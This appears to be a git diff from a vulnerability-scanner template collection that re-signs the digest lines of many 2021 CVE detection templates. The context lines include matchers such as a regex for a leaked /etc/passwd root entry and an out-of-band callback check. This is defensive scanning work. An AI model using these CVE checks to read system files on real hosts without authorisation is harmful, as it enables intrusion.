4a0a00473045022100dd619a0252cd468ed141d033f5a3988f749d845cd1327c27478d5e7eb9992607022017c6a214d67e05c540f2797d9847b9fa17f4926f8c30dfe3095d556499d1fdc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index 7cddaba1f7..c152fdb5dd 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -46,5 +46,4 @@ http: - "contains(tolower(header_2), 'index.php?controller=404')" - "len(body_2) == 0" condition: and - -# digest: 4a0a0047304502210089d31e81655e780868e22803826c9f62f910bf183d9e15f5f5a3128bca8f2d05022019bda0ce9e967732f276de6ffb5369bc78431787003bed3c8d467a1e29f4c10a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f97fefd1afde09abadc3038268d2aefa8470c11de35986bd8319500e98aa10d1022020f299c3ab2ea6278e82cca9589a210b1ec84c974fb2d7de65b76e753114954f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index 49afe4f107..a7e030cf1b 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -43,5 +43,4 @@ http: - "root:.*:0:0:" - "druid:*:1000:1000:" condition: or - -# digest: 4a0a0047304502202b758386864580109ae7b85c1733e0bd0be443af215c149c45957839e04a7dbb022100d42a4373462dfcbc660d8fff80b618b368a9939f6bdcac13ea5f83e9f4bb89db:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008051d0236c46e8808eb3413c872c2bdefd6e2466ba28d11ed5a03c73c4f1679d022100a6ca674702d848e2e818bd58c58223acb1d757f89a208f3409edd0dd9f9e608d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 53b610f1c7..8a060f8079 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -69,5 +69,4 @@ http: regex: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true - -# digest: 490a00463044022009f4aad31c7ab67723b8c11bb473eef11e316661ffd6ca14b7992e1308763b30022005086138e235a6a60a29d67467225f34eb842ec281ff61f02f13c3b12cfe98e6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009fd817d3c6cb44a2c161416e459ba3e4c55e977546650b34e1cb0bf08c135ff90221008961afa61719662b3877c36111feaccd36b153d5f6a853bf9023db11d6d08c13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 7553cb87c8..74f148224f 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -48,5 +48,4 @@ http: part: header words: - "text/html" - -# digest: 4b0a00483046022100b21e0bad78028275a1838f079979a9d6bd845316a43249fd8468db79908e0651022100d20657b489dd8be5f4f99bd1276a7288bcfb06db46427317a6c2e356652cbe7e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022058d7dc154106772d9c8e35dd1eb1b23db3a2007b781c68cb8f349937100779840220215fb8564fa3320e496dba237aee0f6605cd37a387bbe7ce7dcf9801fe259119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 5312d89505..ec01bdbc70 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008eea58a31c84e5b2fccb355c403b9c3783e8de30ef7ab3b9138787737e41c62602201edc888bcb1d5df250e25521e3c0f1ba18e44f2cdce71227d330da6b79bad8ad:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022059d6ffb3cd194351822cba9158d0a37ba10a966a817c5663456dee230e408eaa022012d4ff9155decec0657084a39cd6d8315a935bd94ea5eb9c7d847c86a8ec2d47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 3fba2e8d65..f278f7e346 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220648426c29af0fc00533955bb832c8e5abfec988b8ae58bd9ac431baaa71742940221009f2ca09232192d82225570fb617026bd636aca6eda5d7a5d8bce1170ce391c78:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205dc54f5ddc3703f2457bfa51df1ae03f6e96ee4137e266e603949021b013b522022100b492a6c796f4a1620c28e4645b373e2091f5fb8a19b1281a04cfc71f30326961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 545a38a15d..dc38d225f1 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022005c1b84037e77bfccd1080abcaa446dfd850b0a7173fb1e8503404fe80cc7331022003dd56e0111bb2b9d37052a07d69744c1e07a4be489ceb12eec40a9454999f53:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d2f949f5fb7c60571ab96440f7ee39b9875cc37a26edaab710b2ae263919b48b02201c02451176135d5a6f6815c9b053d955468f0d185c4042e892f91e95021828d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index 915ab69317..8d053f3c23 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210094c91b13a6ff8f552d0d7201cad2ccb2942612a466feaaf3baca58ec98dc3cb5022100d1a74eff875230be605a4e03b2cd7bf083f607b9d554440f14fea13c89a85893:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022045941973925cb7d28e0b5fa0dfd028355bee034ad8d8d183a447cd8d0653fe20022100bd40c30666993e3df2b15cb9fabdde801f6ef6efe773152b03b8b052361a417a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index f027bb57ac..d7cca876cb 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 404 - -# digest: 490a004630440220453ad58e6d5e4ce54f87dd01e790777832807070375e3d6e80100ce862a4f2d202200d382b31a25fdb65fd806c1f3de5fcc461d68efe3cdfb40a912fa26adbc591fd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205951799a00315928bbe5ef43b01b8117cf818fd033e87e9b0cb686eab4d87ab0022100945a078615826298357d16e3842da688e44c466d0d61126b585fd32ed02aaba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 7bf888a6c0..ba532ac030 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e2470cee01ef54c1267bf1dcc03d37631f6df75381c400dad4f7d57d42882558022100b9e843914406dd96a6cd6f491a27e8842dc2b86a0072bf60398cd6b11f1fd583:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b6e9316287cc95149ee19c71d04a17628b50472d3026378f6e867f6c6588e79b0221008699cadd16fa48f345c6e274429540efaec574c68bac9d0cdd7947e019983b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index 8fac89f83b..5173217adc 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -64,5 +64,4 @@ http: - type: dsl dsl: - "status_code_2 == 500 && status_code_3 == 200" - -# digest: 4b0a004830460221009d8208b405c43ce484bf06c92e2fa97d1b7bc7db64cbbbaa53640110adb92411022100b26bbe926f0649576885d6959e6d88b3e7dee057b2ee8416f3d04da60582c9b5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207567485a69dafc96a3c129db462720cfd7b7a76c367208d6d02d6253b9a728b6022100fe85ae3f038cccc0be42b56ff21dcf4897c76ede4029591ce39e587dd1a81139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 24bb4f3110..674c3f3244 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -53,5 +53,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body - -# digest: 4b0a00483046022100ed5b0525531296f42036266ef18f2322b6f44d5397dfaac6f3a69ca5a246ae5f022100d6cf5e637a0495a8fe1544b329b68c6018284a3410b21cbe1f900bc11692ab02:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210095781a72c61c7d9bff95cf36d14fc0fbf70f87a28f0096ef9f5775dfbbb754f9022100aec85ba0cbb38d409e4d7af9ac97d6d4c7c50ebd910009285a3473997dd7105b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index ff30b6d2f5..911e5882e7 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100af4e201aba6b010a6e7e47082364cc57b493e4b60f7513842fe44f4dbfe6687602210084956f79a8914339ca84122c5aaf7439e7c1bb93c5f289ba6cd8c4ad4f025ff1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009ebf37894657b7565ebd314de174f21cf53e2293a33b48f12120be1e03a9d633022034a4408fef09c9c1e7935adbad0d90c13b4f819c840fcc7a9dc69d10a2e7f23a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index 0d696bbf3d..181e0e5ebb 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -61,5 +61,4 @@ http: regex: - '[a-f0-9]{32}' part: body - -# digest: 4a0a00473045022100d88d764d12e8fb173045b910b61fab638eee27791a61f91cc7c214b47c17b96602206d2abb4b5ec6e7edcb51d7b59695f58aab02a5b685ca91c142cbe263cffdd1ee:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206008edf83cb3ddd1bf67d62677445ae321f0fcde7b60df2431df56bc19ba62f3022100bbeb2b9f95e70b9ffc450c3b3690059f4c6c3533e03b49521a1a54b4b83df4d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index f5c64bd28f..6fbd9c4642 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -76,5 +76,4 @@ http: regex: - type="hidden" value="(.*?)"> internal: true - -# digest: 4a0a00473045022044f007341ba779d925abee8ebe0dd7d25c00ba2378ee288d579fb66cef9437ac022100bcb1a675aeb1ff7022b5ce71ce0b21a15547739aa503eb7c16e0dd44bc75436d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220332f86ba5cceec6d0067ffc7854dca4668b0baed695f12138d7aab09f0245bb3022100fffc1b40fcd1f400c6f56e03801c4b35435633f531b114066f78c32262cd05a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index 6731b28994..b96a965801 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201a492278f8532a4b364d6e51578477efaf520ae0fb1aefbdb2558b30450bddfc0221008288fad5a4534fb39e476157d0b391c928fc3c843038d0be999b9e00c83b2884:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220022b0be365b12e932745b9d9cffebeb97be939a9918b3584ae40429df7b72de5022100dc293c141698849ffa9321d3ecec56768f34083776d9421350d2406d794c2eb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 2bf4239b8a..33829ebc0b 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a354384229e85b36238ba82685428a017191f4f6690a750d2d3bb93dfdde74fd022100bed6701f902d1e56e5190574ab889d63cd5c76a6d35037a0b60cdc1b98d91992:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207244c98f495e07a3d74149d5421e27314ea5c2e2962639d40a59661b67dc8701022100b1a4b32b752c669894d62bdc082c0ff7762d7989aeb7e2fd9292ee6158297905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index e944921a6f..672862bbe9 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203d5d4472361509534294bba20b53ee0c3fddcd83b5ef1fb061f0d1753af7f03c0220788b5d5c5606672a51419579d7490eeaf5ac4bef5f46ce809069c120041a0a87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205b28b23c936d0bb2cec46cf9d17fadb953d7eec75d090871cde3ef4f8168b8aa022100e83d029ffb258ae8e65a433ad5f97c999ebd1612cbbdc765f480de9a1dcb280d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index ff117ed3da..22329eb898 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -117,5 +117,4 @@ http: - type: status status: - 500 - -# digest: 4b0a00483046022100b09f5eb2a4d3b7f9a3d41cc71f151cfbbc8eff7c2d1082ff135f9e5b2b70d43a0221009da6233bd2337ed01ae2ed0f2faed025761bc2e4d1ad36c9981b444eb8048db4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100feb4373466a8567d35e67917d458b17699ef09b378e71fc6ee1b52aea1f217ff022100973e943feb38a44b7a1b87779fafd44d757e5f35481fba8baacc3925896886e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index c4b6354371..f47776d958 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -71,5 +71,4 @@ http: part: interactsh_request words: - "User-Agent: Java" - -# digest: 4b0a00483046022100adef5915afa50584545ce0d8d82b9619d1bc62eb0665671c2fe6d1f9765772f0022100f369863dc3fcb0d8ad08643446de6056bf570ab5319a2f062d9de36022744e46:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206549a629cc59ea5193e3b79d49b2857211331730d84467326afe3e15e32110770220630dfd557647ae0325fb7b46a63428c0c7e9b748802a2ada74f6cfb020929d94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index c9a146d3d2..4790468218 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -45,5 +45,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and - -# digest: 490a0046304402206668d4c4906234b3804ede1bc9b829e6f3550c61ee7aa0fadadc1c2b688e32c40220560d0acec41957bc434c114401a4859dee9b57f13bf5db0a6494e9c51fd067d4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c58324f06f3c1dac3fca0f2321737e946149481fc897965c9935c95399b8d8550221009212acdbde9b9bc926a15902e5b6d5983100c16c5c8d532be9243e45a938e916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 33615d45d7..2edba092ba 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203b1819573c03cfd5cd37936f825b02ce0f7ad12fcdb9ab565f383cf7ef515a0c022100b58141d6445b3708067185d6809ec47710dc1b77e83489548efb783f962a5421:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a80e477a2135a33f20a9c50f27c32756b6353cb3fdde5952f370711878f6fcb8022067f727e729e58b54bc19508fec48fee629959f77fc812523866f3b05a3054cb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 27331dfa89..8094b985d4 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008604c3cdf9394970f40c89b8971553017b4e3eb8869ede909afb8a767a938cf1022100a765506fb33c83846278c83f2430d4e3951d267bed1ba4889c873c10939c8980:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022045c29d33b8f58455665c15a94286d38d044b2a0256d7ec847ad776efca6a8b9802204fd043868fef7af32ea59f092cec35e41ee1e2450ca3da2356dd02d42afc6a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index d66c7a0346..3bf3513b3e 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220742ea21edc198cefea70c5082751c77461c4639681e1be9e514758e4255834bb02203369b44cb0ea9edb2367aef41b6df75d86b96aaf5f1bbfabcadda265796fb5bf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203ad782daa4490a102f6b5f04e6331e67b8a08c371f0acf02534fadd93e30496a022100a490b6c63bb7334e594e0f85daeeb9e11e54a12b3d4b741b62d2d0cdbb043330:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index d534308e4b..741be01e9b 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100af8a89b3259af10bf93bb6deee542f02fccfc467e2724354fa7fe58a5bd3841302210090051e188f55b8fa000dfece739166bb2d4075e60b704c2269a8cc90c2403996:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220467a6bae27e20bf56ef95c9b5d636775df0aea6d9524e1c422d57d94c49e412702200afa2fa82f5aa93420d417664c624cb84ff85b1c421d1861e4454cbd5f220216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 7c79418c89..6b92dcaba6 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220086e5ef04fcbb442b02fdc571c1fb11ab9e0bdf5cde14df49dbf6917999102340220740cfd69d072da8bf0b3cad8a053a7b7c3f0f6b3513cbec87cc7179b52b095ba:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207364961c2229ce9ece1f7fb0a635211890a8ae033e80df83201b3e1009ca1aab022100aa41e53865cf9e48943ac2fe6ed932c7879cd69078702bbbf15238137f961434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 72ccbf37e9..bced157c8e 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203ec5902117e2257f3404c8c54da6162b654cf25c77fb7bb3d2d713e4e2c99881022077004b0184cf728b803c449ebc3a9932cc2375a0f85e7ffd7e698ec625ac71a1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d1f5c243ae550f877f1d88e19998eaebe23c5273c2d5326100c9fe26f13d811602207178d9d5ccc12c44d632f2d3169cc8ce10b6c1f4eeec2083e63121e3fd6e5aed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index e561c3b0e3..243fe762bf 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100aa587c559eb7ed52f8e88c73cbaf800a0a9a3431483ab4b3a393be3af24a0581022100bf149fc689df2ce43ab5e276db69cbdd55b20da8efc2e25ecb16d80f472446c2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100df0bd135c01ec9fddf4f2c13b317463b1f4d47fdbafb0087900fac8c3e997797022100c88d43cb3604ab3a6b42c55498716f3432bc192a2c83818fa0e2250654e553fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 5f9e732606..9e38a41aad 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220016105a8a4fa8bd77d9fa22e1e3dc29e2b21ed8aabe0981e03981678b787eb4c0220049a09147ff9c2b0d0fd18b713c64c5613fd2dd04ec8bb03fdb3e66c89909279:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100826625cfe6c54dca471e49c359cef1ef23ded00e3471b46c63f028a386a7bcc5022060025bec6fb756b03e2cf7332f6a01748f46f5ca93e472b7e0f058d1dfdfd71c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 526dc15018..e0629ba9a0 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201553d1a7efd1fe967f3440dac34391a7bfd3db82b2e09b75f0c1446fc752fd14022100992b1767da40cc9019dc451a604ac7ac4ced0f9687f7f98060d9dd716603db28:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022048bd9c3842bf37b60ec56ab2691ff98816f20cfb147bfeb4c3d16e6a3e1eabc402207e327a96f3d7a9c9f64ec1c82a008a24b69208def079bae481fd3ffddd8b24fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index cc4b5a4c52..3f72372051 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - -# digest: 490a00463044022024670809456e3d5142f2fec404d74b24a2e6d4f61e64a874e1da3158f2f7a46502206ab69cff5325d285caa365ab0122d22bc1409fcaafcbd50e1d5779bc59267b27:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201ae64baa48e8e92741a7a03718dc7f682d496aa2f515053c1779ecc77610ff180220694aca9f75f6c92b064e52591e09b5fa40c9fb599f585ca96ce7c87e7c0f9add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index c6c57623fb..89868adb4a 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b41d8c6acac614d8bd19ff1b02e2735f180a68739c3b4fbf558c9d5e1198389c022033046f8102a8b8eb63b852fed414816961927629d24a6f44b10075f8dffcf465:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202271dde4047e802086a84fa1ff03f500eba0199d677d689c66c46dcbca3b17ff022100da76b97ca9f7b94b0b30bd85833252f8932e5cbea73b9e290409cdee0ff017be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index bea701aa83..711e3cfe1a 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210092cb57fa6333e158913e0fe76df55d1f6dbb3db89714177c737672123a487ddf022100a6d6433ae1371404990c7171f022ab72a1f5bd0d32b60e3c544b4fbf5cf43856:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009d8e442eb10da4bc7d02de59bb220c0cdd51f9f70e586116238f94c076fd226a02203c7cd55d640160e40245e7456e81ecfb2212fc4e00e18c0babf892c96cf7a143:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 43b1e8eb38..1e350011f8 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -104,5 +104,4 @@ http: regex: - '(.*?)' internal: true - -# digest: 4a0a0047304502200feffe3b786028f829fe5fd0172f76a1939ab1345d5b6ca3877a399c3e3c939e02210095d031a04adcba9eacf1375c5b3d87518c6ea5a6bca35734d46ee5c5ae140079:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100931c0f14cab721db452e16f97ebc3801642a4903f4cfa82a3d57854084aa435a02206eeff647d024e50eb08426cd7f4553e504bf84a51614b567ff55fdfb2dcc516b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 6c81dc0701..32bdac762b 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -115,5 +115,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203a576791547cd333dc458a79a6277633fd4197762d5041cc34a61e24ca64c5d2022049846efbbc558fab3f58835fe7feae722b38eea1550d61e0937c93d8ff10b164:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d926f45541abb89d0955ac26ad276dc26747ca272348f00beae4960bb644b3bc022064befbe42708d4e6d0a957a10f6e403747a3c04df350c27b755c02e7182d3ff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index a61bee16b6..eecc1afffb 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022100c68c7cee931f8e0acda2fd798c4e2536afc0f61c5eed77b8212281b817512cb2021f5acf80ef4b28a70a2de16bb19c63dd7be5d4c15574d2080f8666b03af1d406:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f9d4748f0181d636c36b7962c7f1ff3896d309897e769b0c51a351c7ba68bc1e022100ad76367083051e8efd173830143e6aa7d36e3389c86b4b47714e78bed5fa0c24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index 8f98c3ded3..d7eee072f7 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207497dc65f2393b468fee3145e28306911f5e588464d4566c5e70346cee857522022100b32f7a61e2fa08e6157513c385bbaee669ed9b36e064cdb95ed72d1578506a35:922c64590222798bb761d5b6d8e72950 +# digest: 